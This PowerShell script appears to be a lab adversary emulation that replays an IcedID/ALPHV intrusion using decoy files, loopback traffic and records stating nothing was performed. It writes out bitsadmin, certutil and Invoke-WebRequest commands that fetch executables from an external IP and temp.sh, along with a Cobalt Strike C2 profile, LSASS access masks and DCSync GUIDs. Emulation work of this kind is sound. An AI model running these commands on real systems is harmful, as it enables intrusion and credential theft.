#Requires -Version 5.1
#Requires -RunAsAdministrator
[CmdletBinding()]param([switch]$LabConfirmed)
. "$PSScriptRoot\IcedAlphvSim-utilities.ps1";Assert-IcedAlphvSafety -LabConfirmed:$LabConfirmed;$p=Initialize-IcedAlphvEnvironment;if(-not(Test-Path(Join-Path $p.Evidence 'icedid-tls.json'))){throw'Run phase 1 first'}
$toovey=Join-Path $p.Beachhead 'toovey.exe';New-IcedAlphvDecoy $toovey 'renamed ScreenConnect installer decoy';Invoke-IcedAlphvDecoy $toovey 'toovey.exe ScreenConnect.ClientSetup.exe?e=Access&y=Guest&h=REDACTED&p=443&s=GUID&k=REDACTED';Write-IcedAlphvFile(Join-Path $p.Evidence 'screenconnect-service.json')(([ordered]@{reportedEvent=7045;startup='auto';serviceCreated=$false;relayContacted=$false;installations=0;parameters=@('e','y','h','p','s','k','t')}|ConvertTo-Json))'ScreenConnect negative record';Add-IcedAlphvTimeline 120 rmm 'ScreenConnect installation and command channel represented' @{installed=$false;serviceCreated=$false;technique='T1219'}
$downloads=[ordered]@{methods=@('bitsadmin','certutil','PowerShell Invoke-WebRequest');reportedTempSh='http://temp.sh/VSlAV/http64.exe';observedFailure='HTML presentation page downloaded instead of payload';successfulDownloads=0;bitsJobs=0;certutilNetwork=0;PowerShellNetwork=0;actual='metadata only'};Write-IcedAlphvFile(Join-Path $p.Evidence 'download-attempts.json')($downloads|ConvertTo-Json -Depth 7)'download failures';foreach($c in @('bitsadmin /transfer job http://85.209.11.48/download/http64.exe C:\ProgramData\http64.exe','certutil -urlcache -split -f http://85.209.11.48/download/test1.exe test1.exe','powershell Invoke-WebRequest http://temp.sh/VSlAV/http64.exe -OutFile C:\ProgramData\rr.exe')){Invoke-IcedAlphvDecoy $toovey $c}
$cobalt=Join-Path $p.Beachhead 'http64.dll';New-IcedAlphvDecoy $cobalt 'Cobalt Strike beacon decoy' 'cd0e941587672ab1517681a7e3b4f93a00020f8c8c8479a76b9e3555bcd04121';Invoke-IcedAlphvDecoy $cobalt 'rundll32.exe http64.dll,Start';$profile=[ordered]@{server='85.209.11.48';port=80;get='/load';post='/submit.php';sleepMs=60000;maxGet=1048576;jitter=0;licenseId=1580103824;spawnto='rundll32.exe';userAgent='MSIE 9.0 / Windows NT 6.0';reportedInjectionTargets=@('winlogon.exe','rundll32.exe');injectionPerformed=$false;actual='127.0.0.1; proxy disabled'};Write-IcedAlphvFile(Join-Path $p.Evidence 'cobalt-profile.json')($profile|ConvertTo-Json -Depth 8)'Cobalt profile';Invoke-IcedAlphvLoopback 80 '85.209.11.48:80' 'Cobalt Strike HTTP'
$cslite=Join-Path $p.Beachhead 'cslite.exe';New-IcedAlphvDecoy $cslite 'CSharp Streamer RAT decoy' '4103cc8017409963b417c87259af2a955653567cdbf7d5504198dd350f9ef9c1';Invoke-IcedAlphvDecoy $cslite 'cslite.exe';Write-IcedAlphvFile(Join-Path $p.Beachhead 'AppData\Local\Temp\csharp-streamer.tmp')'INERT .NET assembly marker. No assembly was loaded.''CSharp Streamer temp marker';$credential=[ordered]@{reportedSources=@('cslite.exe','WerFault.exe','rundll32.exe');lsassMasks=@('0x1010','0x1FFFFF');callTrace='UNKNOWN';processHandlesOpened=0;memoryRead=$false;mimikatz=$false;dcsync=@{offsetMinutes=200;eventId=4662;schemaGuid='19195a5b-6da0-11d0-afd3-00c04fd930c9';rightsGuid='1131f6ad-9c07-11d1-f79f-00c04fc2dcd2';performed=$false}}
Write-IcedAlphvFile(Join-Path $p.Evidence 'credential-dcsync-negative-record.json')($credential|ConvertTo-Json -Depth 8)'credential negative record';foreach($port in @(135,139,80,443,3389)){Invoke-IcedAlphvLoopback $port "109.236.80.191:$port / www.i2rtqyj.ekz" 'CSharp Streamer WebSocket/socket.io'};Add-IcedAlphvTimeline 180 credential-access 'CSharp Streamer LSASS access represented' @{handles=0;credentials='none';technique='T1003.001'};Add-IcedAlphvTimeline 220 credential-access 'DCSync traffic and event evidence represented' @{directoryReplication=$false;technique='T1003.006'}
foreach($h in @('BEACHHEAD','DC1','DC2','BACKUP-SRV','FILE-SRV')){$d=Join-Path $p.Hosts $h;New-Item $d -ItemType Directory -Force|Out-Null;Write-IcedAlphvFile(Join-Path $d 'host-record.json')(([ordered]@{host=$h;synthetic=$true;screenConnectInstalled=$false;RDP=$false;SMB=$false;WMI=$false}|ConvertTo-Json))'synthetic host'};$lateral=[ordered]@{reported=@('SMB installer copies','Impacket wmiexec','ScreenConnect sessions','native RDP','CSharp Streamer RDP proxy');wmiexecOutputPattern='\\127.0.0.1\ADMIN$\__%timestamp%';remoteHostName='77724F2';remoteSystemsTouched=0;servicesCreated=0;rdpSessions=0;sharesAccessed=0};Write-IcedAlphvFile(Join-Path $p.Evidence 'lateral-movement.json')($lateral|ConvertTo-Json -Depth 7)'lateral negative record'
foreach($day in @(2,5,8)){foreach($port in @(135,445,3389)){Invoke-IcedAlphvLoopback $port "SoftPerfect scan day $day, generated loopback target only" 'netscan'};Add-IcedAlphvTimeline($day*1440)discovery "Day-$day SoftPerfect netscan represented" @{scannedExternalHosts=0;ports=@(135,445,3389)}};Add-IcedAlphvTimeline 2880 lateral-movement 'Day-two DC, backup, and file-server movement represented' @{remoteConnections=0};Add-IcedAlphvTimeline 10080 lateral-movement 'Day-seven ScreenConnect/WMI and CSharp Streamer RDP activity represented' @{remoteConnections=0}
